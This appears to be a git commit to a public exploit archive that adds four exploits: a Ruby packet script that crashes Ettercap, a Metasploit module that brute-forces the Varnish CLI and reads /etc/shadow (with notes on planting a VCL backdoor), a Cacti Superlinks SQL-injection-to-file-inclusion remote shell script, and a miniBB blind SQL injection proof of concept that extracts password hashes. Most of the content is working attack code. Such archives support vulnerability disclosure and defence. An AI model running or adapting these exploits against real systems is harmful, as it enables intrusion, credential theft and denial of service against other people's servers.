From 9f4c7b310b66521fada6c69bbdbbffdee2823eb8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Sun, 21 Dec 2014 04:51:18 +0000 Subject: [PATCH] Updated 12_21_2014 --- files.csv | 4 + platforms/linux/dos/35580.rb | 203 ++++++++++++++++++++++++++++++++ platforms/linux/remote/35581.rb | 168 ++++++++++++++++++++++++++ platforms/php/webapps/35578.sh | 101 ++++++++++++++++ platforms/php/webapps/35579.txt | 48 ++++++++ 5 files changed, 524 insertions(+) create mode 100755 platforms/linux/dos/35580.rb create mode 100755 platforms/linux/remote/35581.rb create mode 100755 platforms/php/webapps/35578.sh create mode 100755 platforms/php/webapps/35579.txt diff --git a/files.csv b/files.csv index 548e0dad0..0569f7d29 100755 --- a/files.csv +++ b/files.csv @@ -32041,3 +32041,7 @@ id,file,description,date,author,platform,type,port 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 'arama_islem.asp' Cross Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 'vtigerservice.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0 +35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0 +35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80 +35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0 +35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082 diff --git a/platforms/linux/dos/35580.rb b/platforms/linux/dos/35580.rb new file mode 100755 index 000000000..f6e605b81 --- /dev/null +++ b/platforms/linux/dos/35580.rb @@ -0,0 +1,203 @@ +#Exploit Title: 6 Remote ettercap Dos exploits to 1 +#Date: 19/12/2014 +#Exploit Author: Nick Sampanis +#Vendor Homepage: http://ettercap.github.io +#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz +#Version: 8.0-8.1 +#Tested on: Linux +#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379 +#Make sure that you have installed packefu and pcaprub + +require 'packetfu' +include PacketFu + +if ARGV.count < 4 + puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface" + puts "[-]Use valid mac for your interface, if you dont know"+ + " victim's ip address use broadcast" + exit +end + +def nbns_header + u = UDPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_daddr = ARGV[1] + u.ip_saddr = ARGV[0] + u.udp_src = 4444 + u.udp_dst = 137 + u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00" + u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name + u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name + u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name + u.payload << "\x00\x20" #type + u.payload << "\x00\x01" #class + u.payload << "A"*1000 #pad + u.recalc + u.to_w(ARGV[3]) +end +def gg_client + u = TCPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_saddr = ARGV[0] + u.ip_daddr = ARGV[1] + u.tcp_src = 3333 + u.tcp_dst = 8074 + u.payload = "\x15\x00\x00\x00" #gg_type + u.payload << "\xe8\x03\x00\x00" #gg_len + u.payload << "A"*1000 + u.recalc + u.to_w(ARGV[3]) +end +def dhcp_header + u = UDPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_daddr = ARGV[0] + u.ip_saddr = ARGV[1] + u.udp_src = 67 + u.udp_dst = 4444 + u.payload = "\x02"*236 + u.payload << "\x63\x82\x53\x63" + u.payload << "\x35" + u.payload << "\x00\x05\x00" + u.payload << "\x51" + u.payload << "\x00" #size + u.payload << "A" * 3 #pad + u.recalc + u.to_w(ARGV[3]) +end + +def mdns_header + u = UDPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_daddr = ARGV[1] + u.ip_saddr = ARGV[0] + u.udp_src = 4444 + u.udp_dst = 5353 + u.payload = "\x11\x11" #id + u.payload << "\x00\x00" #flags + u.payload << "\x00\x01" #questions + u.payload << "\x00\x00" #answer_rr + u.payload << "\x00\x00" #auth_rrs + u.payload << "\x00\x00" #additional_rr + u.payload << "\x06router\x05local\x00" #name + u.payload << "\x00\x01" #type + u.payload << "\x00\x01" #class + u.recalc + u.to_w(ARGV[3]) +end +def mdns_dos_header + u = UDPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_daddr = ARGV[1] + u.ip_saddr = ARGV[0] + u.udp_src = 4444 + u.udp_dst = 5353 + u.payload = "\x11\x11" #id + u.payload << "\x00\x00" #flags + u.payload << "\x00\x01" #questions + u.payload << "\x00\x00" #answer_rr + u.payload << "\x00\x00" #auth_rrs + u.payload << "\x00\x00" #additional_rr + u.payload << "\x01" + u.payload << "\x00\x01" #type + u.payload << "\x00\x01" #class + u.payload << "A"*500 + u.recalc + u.to_w(ARGV[3]) +end + +def pgsql_server + u = TCPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_saddr = ARGV[1] + u.ip_daddr = ARGV[0] + u.tcp_src = 5432 + u.tcp_dst = 3333 + u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" + u.recalc + u.to_w(ARGV[3]) +end +def pgsql_client + u = TCPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_saddr = ARGV[0] + u.ip_daddr = ARGV[1] + u.tcp_src = 3333 + u.tcp_dst = 5432 + u.payload = "\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00" + u.recalc + u.to_w(ARGV[3]) +end + +def pgsql_client_shell + u = TCPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_saddr = ARGV[0] + u.ip_daddr = ARGV[1] + u.tcp_src = 3333 + u.tcp_dst = 5432 + u.payload = "\x70" + u.payload << "\x00\x00\x03\xe9" #len + u.payload << "A"*1000 + u.payload << "\x00" + u.recalc + u.to_w(ARGV[3]) +end + +def radius_header + u = UDPPacket.new() + u.eth_saddr = ARGV[2] + u.eth_daddr = "ff:ff:ff:ff:ff:ff" + u.ip_daddr = ARGV[1] + u.ip_saddr = ARGV[0] + u.udp_src = 4444 + u.udp_dst = 1645 + u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01" + u.recalc + u.to_w(ARGV[3]) +end + +puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis" +puts "[+]-1- nbns plugin CVE-2014-9377" +puts "[+]-2- gg dissector CVE-2014-9376" +puts "[+]-3- dhcp dissector CVE-2014-9376" +puts "[+]-4- mdns plugin CVE-2014-9378" +puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)" +puts "[+]-6- radius dissector CVE-2014-9379" +print "choice:" +choice = $stdin.gets.chomp().to_i() + +case choice +when 1 + puts "[+]Sending nbns packet.." + nbns_header +when 2 + puts "[+]Sending client gg packet.." + gg_client +when 3 + puts "[+]Sending dhcp packet.." + dhcp_header +when 4 + puts "[+]Sending mdns packet.." + mdns_header + mdns_dos_header +when 5 + puts "[+]Sending pgsql packet.." + pgsql_client + pgsql_server + pgsql_client_shell +when 6 + puts "[+]Sending radius packet.." + radius_header +else + puts "[-]Unrecognized command " +end + diff --git a/platforms/linux/remote/35581.rb b/platforms/linux/remote/35581.rb new file mode 100755 index 000000000..28e598fdc --- /dev/null +++ b/platforms/linux/remote/35581.rb @@ -0,0 +1,168 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::AuthBrute + include Msf::Auxiliary::Scanner + + def initialize + super( + 'Name' => 'Varnish Cache CLI Interface Bruteforce Utility', + 'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce + list of passwords. This module will also attempt to read the /etc/shadow root password hash + if a valid password is found. It is possible to execute code as root with a valid password, + however this is not yet implemented in this module.', + 'References' => + [ + [ 'OSVDB', '67670' ], + [ 'CVE', '2009-2936' ], + # General + [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ], + [ 'CVE', '1999-0502'] # Weak password + ], + 'Author' => [ 'patrick' ], + 'License' => MSF_LICENSE + ) + + register_options( + [ + Opt::RPORT(6082), + OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", + File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]), + ], self.class) + + deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS') + end + + def run_host(ip) + connect + res = sock.get_once(-1,3) # detect banner + if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth + vprint_status("Varnishd CLI detected - authentication required.") + each_user_pass { |user, pass| + sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail. + res = sock.get_once(-1,3) # grab challenge + if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth + challenge = $1 + secret = pass + "\n" # newline is needed + response = challenge + "\n" + secret + challenge + "\n" + response = Digest::SHA256.hexdigest(response) + sock.put("auth #{response}\n") + res = sock.get_once(-1,3) + if (res =~ /107 \d+/) # 107 auth + vprint_status("FAILED: #{secret}") + elsif (res =~ /200 \d+/) # 200 ok + print_good("GOOD: #{secret}") + + report_auth_info( + :host => rhost, + :port => rport, + :sname => ('varnishd'), + :pass => pass, + :proof => "#{res}", + :source_type => "user_supplied", + :active => true + ) + + sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file. + res = sock.get_once(-1,3) + if (res =~ /root:([\D\S]+):/) # lazy. + if ($1[0] == "!") + vprint_error("/etc/shadow root uid is disabled.\n") + else + print_good("/etc/shadow root enabled:\nroot:#{$1}:") + end + else + vprint_error("Unable to read /etc/shadow?:\n#{res}\n") + end + + break + else + vprint_error("Unknown response:\n#{res}\n") + end + end + } + elsif (res =~ /Varnish Cache CLI 1.0/) + print_good("Varnishd CLI does not require authentication!") + else + vprint_error("Unknown response:\n#{res}\n") + end + disconnect + end +end + +=begin + +aushack notes: + +- varnishd typically runs as root, forked as unpriv. +- 'param.show' lists configurable options. +- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed. +- 'user' is nobody. param.set user root (may have to stop/start the child to activate) +- 'group' is nogroup. param.set group root (may have to stop/start the child to activate) +- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail). +- vcc_unsafe_path is on. used to 'import ../../../../file' etc. +- vcc_allow_inline_c is off. param.set vcc_allow_inline_c on to enable code execution. +- code execution notes: + +* quotes must be escaped \" +* \n is a newline +* C{ }C denotes raw C code. +* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C +* #import etc must be "newline", i.e. C{ \n#include \n dosomething(); }C (without 2x \n, include statement will not interpret correctly). +* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode. +* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic. +* example trigger for backdoor: + +VCL server: + vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n" + vcl.use foo + start + +Attacker: + telnet target 80 + GET /backd00r HTTP/1.1 + Host: 127.0.0.1 + +(... wait for child to execute debug trap INT3 / shellcode). + +CLI protocol notes from website: + +The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end. + +Requests are whitespace separated tokens terminated by a newline (NL) character. + +Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), ( +), (\"), (\%03o) and (\x%02x) + +The response consists of a header which can be read as fixed format or ASCII text: + + 1-3 %03d Response code + 4 ' ' Space + 5-12 %8d Length of body + 13 \n NL character. +Followed by the number of bytes announced by the header. + +The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h: + +enum cli_status_e { + CLIS_SYNTAX = 100, + CLIS_UNKNOWN = 101, + CLIS_UNIMPL = 102, + CLIS_TOOFEW = 104, + CLIS_TOOMANY = 105, + CLIS_PARAM = 106, + CLIS_OK = 200, + CLIS_CANT = 300, + CLIS_COMMS = 400, + CLIS_CLOSE = 500 +}; +=end + diff --git a/platforms/php/webapps/35578.sh b/platforms/php/webapps/35578.sh new file mode 100755 index 000000000..14471a55c --- /dev/null +++ b/platforms/php/webapps/35578.sh @@ -0,0 +1,101 @@ +#!/bin/sh +############## +# Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection +# Date: 19/12/2014 +# Exploit Author: Wireghoul +# Software Link: http://docs.cacti.net/plugin:superlinks +# Identifiers: CVE-2014-4644, EDB-ID-33809 +# Exploit explanation through inline comments +# Patch provided at the end +# +# This is the year where hope fails you -- Slipknot: Pulse of the maggots +# +############## + +echo -e "\e[32m *-*, \e[31m ___________" +echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\" +echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\" +echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'" +echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'" +echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m" +echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___" +echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC" +echo +if [ -z $1 ]; then + echo -e "Usage $0 \n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n"; + exit 2; +fi + +# This exploit is a second order LFI through SQLI, so first we must write some data to disk +# Luckily the application logs all sort of stuff, so lets poison the application log +# The reason for this is manyfold, read on. +curl --silent "$1?id=SHELLLLEHS" > /dev/null + +# Now lets analyse the vulnerability: +# superlinks.php:21:if (isset($_GET['id'])) { +# superlinks.php:22: $pageid=$_GET['id']; +# superlinks.php:23:} +# superlinks.php:24: +# superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT +# superlinks.php:26: id, +# superlinks.php:27: title, +# superlinks.php:28: style, +# superlinks.php:29: contentfile +# superlinks.php:30: FROM (superlinks_pages, superlinks_auth) +# superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid +# superlinks.php:32: AND id=" . $pageid . " +# This is where the injection occurs, we can now union select 1,2,3,4 -- ftw +# However the real fun occurs a few lines later +# superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile']; +# superlinks.php:58: +# superlinks.php:59: if (file_exists($my_file)) { +# superlinks.php:60: @include_once($my_file); +# We can now include a file of our choosing (LFI) based on the data returned from the SQLi +# There are only a few problems: +# * We cannot use strings/quotes as magic quotes are usually on +# * We do not know the local path for the LFI +# * Usual tricks like /proc/self* have been patched +# * Database server and web server may be different hosts +# Lets solve the easy one first, we dont need to quote our strings, hex encoding works great +# The second one is a little trickier, we can brute force LFI locations... or +# We can dynamically locate a file path which is stored in the database and present on the webserver +# $ mysqldump cacti | grep '\.log' +# INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password',''); +# $ ls -la /var/log/cacti/cacti.log +# -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log +# $ tail /var/log/cacti/cati.log +# ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name" +# WINRAR! + +# We can now include the poisoned log file by fetching the log path from the database +# and prepending it with the normal directory traversal pattern ../../../ using concat() +# We traverse 8 deep, that's usually enough +echo -ne "Dropping into shell, type exit to quit.\ncactishell> " +while read line; do +if [ "$line" == "exit" ]; then + exit +fi +comand=`echo -n $line | sed -e's/ /+/g'` +curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \ +sed -n '/SHELL/, $p' | \ +sed -e 's/.*SHELL//' |\ +sed '/LLEHS/, $d' +echo -n "cactishell> " +done + +# Proposed patch +# Vendor has a patch in a SVN repo somewhere: +# http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475 +# Yet has not made the patch available, or responded to requests to do so: +# http://forums.cacti.net/viewtopic.php?t=53711 +#--- superlinks.php 2014-12-18 02:05:37.706013833 -0500 +#+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500 +#@@ -19,7 +19,7 @@ +# +# $pageid = 0; +# if (isset($_GET['id'])) { +#- $pageid=intval($_GET['id']); +#+ $pageid=$_GET['id']; +# } +# +# $page = db_fetch_row("SELECT DISTINCT \ No newline at end of file diff --git a/platforms/php/webapps/35579.txt b/platforms/php/webapps/35579.txt new file mode 100755 index 000000000..29740a341 --- /dev/null +++ b/platforms/php/webapps/35579.txt @@ -0,0 +1,48 @@ +# Exploit Title: miniBB 3.1 Blind SQL Injection +# Date: 23-11-2014 +# Software Link: http://www.minibb.com/ +# Exploit Author: Kacper Szurek +# Contact: http://twitter.com/KacperSzurek +# Website: http://security.szurek.pl/ +# CVE: CVE-2014-9254 +# Category: webapps + +1. Description + +preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp). + +File: bb_func_unsub.php +$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0); + +$allowUnsub=FALSE; +$chkCode=FALSE; + +if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){ + //trying to unsubscribe directly from email + $chkField='email_code'; + $chkVal=$_GET['code']; + $userCondition=TRUE; + $chkCode=TRUE; +} +else{ + //manual unsubsribe + $chkField='user_id'; + $chkVal=$user_id; + $userCondition=($usrid==$user_id); +} + +if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal)) + +http://security.szurek.pl/minibb-31-blind-sql-injection.html + +2. Proof of Concept + +http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != ' + +This SQL will check if first password character user ID=1 is ?c?. + +If yes, it will sleep 5 seconds. + +3. Solution: + +http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html \ No newline at end of file